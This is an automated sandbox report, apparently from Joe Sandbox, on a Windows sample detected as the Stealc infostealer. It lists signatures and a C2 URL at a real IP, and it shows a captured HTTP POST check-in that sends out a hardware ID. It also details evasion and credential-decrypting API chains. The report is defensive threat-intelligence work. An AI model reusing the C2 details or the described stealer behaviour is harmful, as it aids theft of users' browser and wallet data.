Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1532109
MD5:	ebddc57c042f9c28f78e5d1fa1c75020
SHA1:	a3252e4609bde886ed5b96b72a439b18fe5bd9a4
SHA256:	c6b0379b9b644a4d5c6cd89d57ace4f95810d31ebf2eb7b9d8310f88c04cfd85
Tags:	exeuser-Bitsight
Infos:

Detection

Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Program does not show much activity (idle)

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.37/	URL Reputation: Label: malware
Source: http://185.215.113.37	URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	URL Reputation: Label: malware

Found malware configuration

Source: 0.2.file.exe.540000.0.unpack

Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0054C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,	0_2_0054C820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00547240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00547240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00549AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00549AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00549B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00549B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00558EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00558EA0

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_005538B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00554910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00554910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0054DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0054DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0054E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0054E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00554570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00554570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0054ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0054ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0054BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0054BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0054DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0054DE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005416D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0054F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0054F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00553EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00553EA0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://185.215.113.37/e2b1563c6670f193.php

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKJJEHCBAKFBFHJKFBKHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 36 42 34 30 41 34 46 34 39 31 34 34 32 39 33 39 34 34 32 32 30 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 2d 2d 0d 0a Data Ascii: ------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="hwid"A6B40A4F49144293944220------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="build"doma------CBKJJEHCBAKFBFHJKFBK--

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.215.113.37 185.215.113.37

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00544880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_00544880

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache

Source: unknown

HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKJJEHCBAKFBFHJKFBKHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 36 42 34 30 41 34 46 34 39 31 34 34 32 39 33 39 34 34 32 32 30 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 2d 2d 0d 0a Data Ascii: ------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="hwid"A6B40A4F49144293944220------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="build"doma------CBKJJEHCBAKFBFHJKFBK--

Source: file.exe, 00000000.00000002.1824677690.000000000105E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1824677690.00000000010B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1824677690.00000000010B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1824677690.00000000010B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1824677690.00000000010B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php&
Source: file.exe, 00000000.00000002.1824677690.00000000010B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php2
Source: file.exe, 00000000.00000002.1824677690.00000000010B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpY
Source: file.exe, 00000000.00000002.1824677690.00000000010B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpg
Source: file.exe, 00000000.00000002.1824677690.00000000010C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpows
Source: file.exe, 00000000.00000002.1824677690.00000000010B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37=
Source: file.exe, 00000000.00000002.1824677690.000000000105E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37D

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00900816	0_2_00900816
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0090583B	0_2_0090583B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008FD123	0_2_008FD123
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0090B125	0_2_0090B125
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009072A8	0_2_009072A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009022EA	0_2_009022EA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008FECB6	0_2_008FECB6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007F4C36	0_2_007F4C36
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008CDC34	0_2_008CDC34
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00908D9E	0_2_00908D9E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0083154B	0_2_0083154B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00903D5B	0_2_00903D5B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007D9588	0_2_007D9588
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00810ECF	0_2_00810ECF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007F6F97	0_2_007F6F97

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 005445C0 appears 316 times

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: tjghrrql ZLIB complexity 0.994973742716958

Source: file.exe

Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: file.exe, 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1783006723.0000000004F00000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00559600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00559600

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00553720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00553720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\3V0P032J.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: file.exe

Static file information: File size 1825792 > 1048576

Source: file.exe

Static PE information: Raw size of tjghrrql is bigger than: 0x100000 < 0x197a00

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.540000.0.unpack :EW;.rsrc :W;.idata :W; :EW;tjghrrql:EW;uavtyefl:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;tjghrrql:EW;uavtyefl:EW;.taggant:EW;

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00559860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00559860

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: file.exe

Static PE information: real checksum: 0x1bfbfe should be: 0x1cb738

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: tjghrrql
Source: file.exe	Static PE information: section name: uavtyefl
Source: file.exe	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B3086 push eax; mov dword ptr [esp], edx	0_2_009B30C3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A23886 push 4BFB78EBh; mov dword ptr [esp], ebx	0_2_00A238C9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A23886 push ebx; mov dword ptr [esp], ebp	0_2_00A23923
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0098E0AF push eax; mov dword ptr [esp], 7F978D2Dh	0_2_0098E0F8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009D70C8 push eax; mov dword ptr [esp], 4E265596h	0_2_009D71E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009D70C8 push 431548ADh; mov dword ptr [esp], ebx	0_2_009D7203
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009D70C8 push 1A29FD00h; mov dword ptr [esp], eax	0_2_009D7390
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009BA8C2 push 5B471672h; mov dword ptr [esp], ebx	0_2_009BA8EB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0055B035 push ecx; ret	0_2_0055B048
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091A0E5 push 2C1AF6F5h; mov dword ptr [esp], edx	0_2_0091A100
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091A0E5 push eax; mov dword ptr [esp], esi	0_2_0091A285
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009890E4 push ecx; mov dword ptr [esp], ebp	0_2_0098913F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009890E4 push 51F2DC29h; mov dword ptr [esp], edx	0_2_00989173
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009A001A push ecx; mov dword ptr [esp], esi	0_2_009A0077
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00900816 push 59999B0Bh; mov dword ptr [esp], eax	0_2_00900844
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00900816 push edx; mov dword ptr [esp], 7DB375FCh	0_2_00900848
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00900816 push edx; mov dword ptr [esp], eax	0_2_0090092A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00900816 push 26F6661Eh; mov dword ptr [esp], ebp	0_2_0090099A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00900816 push eax; mov dword ptr [esp], 6A8E3E1Bh	0_2_00900A36
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00900816 push 2D61EBA9h; mov dword ptr [esp], esi	0_2_00900A5C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00900816 push eax; mov dword ptr [esp], ebx	0_2_00900ABA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00900816 push 7A4BB734h; mov dword ptr [esp], edi	0_2_00900AE5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00900816 push eax; mov dword ptr [esp], edx	0_2_00900B4A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00900816 push esi; mov dword ptr [esp], 5FE58B28h	0_2_00900BA5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00900816 push 74597172h; mov dword ptr [esp], edx	0_2_00900C21
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00900816 push 1C6FD371h; mov dword ptr [esp], esi	0_2_00900C56
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00900816 push ebp; mov dword ptr [esp], 37DF1CA8h	0_2_00900CA7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00900816 push 7A3BF454h; mov dword ptr [esp], ebx	0_2_00900CE1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00900816 push eax; mov dword ptr [esp], ecx	0_2_00900CE5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00900816 push 7472B847h; mov dword ptr [esp], ebp	0_2_00900D17
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00900816 push 36E51FF4h; mov dword ptr [esp], ebp	0_2_00900D2A

Source: file.exe

Static PE information: section name: tjghrrql entropy: 7.953395842513043

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\file.exe

0_2_00559860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A2101 second address: 7A19FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 xor dword ptr [ebp+122D259Ah], esi 0x0000000f push dword ptr [ebp+122D0D8Dh] 0x00000015 jng 00007FE83906A39Fh 0x0000001b jmp 00007FE83906A399h 0x00000020 call dword ptr [ebp+122D1F76h] 0x00000026 pushad 0x00000027 mov dword ptr [ebp+122D2373h], esi 0x0000002d xor eax, eax 0x0000002f cmc 0x00000030 mov edx, dword ptr [esp+28h] 0x00000034 js 00007FE83906A38Ch 0x0000003a xor dword ptr [ebp+122D2594h], eax 0x00000040 add dword ptr [ebp+122D2594h], ecx 0x00000046 mov dword ptr [ebp+122D2CC7h], eax 0x0000004c jmp 00007FE83906A38Fh 0x00000051 add dword ptr [ebp+122D2594h], eax 0x00000057 mov esi, 0000003Ch 0x0000005c mov dword ptr [ebp+122D354Ah], ecx 0x00000062 pushad 0x00000063 add bh, 00000056h 0x00000066 jmp 00007FE83906A392h 0x0000006b popad 0x0000006c add esi, dword ptr [esp+24h] 0x00000070 mov dword ptr [ebp+122D354Ah], esi 0x00000076 lodsw 0x00000078 jmp 00007FE83906A396h 0x0000007d add eax, dword ptr [esp+24h] 0x00000081 stc 0x00000082 jmp 00007FE83906A38Ch 0x00000087 mov ebx, dword ptr [esp+24h] 0x0000008b sub dword ptr [ebp+122D2373h], edi 0x00000091 nop 0x00000092 jl 00007FE83906A394h 0x00000098 push eax 0x00000099 push eax 0x0000009a push edx 0x0000009b jmp 00007FE83906A391h 0x000000a0 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 911458 second address: 911463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 911463 second address: 911467 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 911467 second address: 911470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A19E1 second address: 7A19E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A19E5 second address: 7A19FF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE839054481h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91065F second address: 910686 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A38Dh 0x00000007 jmp 00007FE83906A392h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 910686 second address: 91068C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
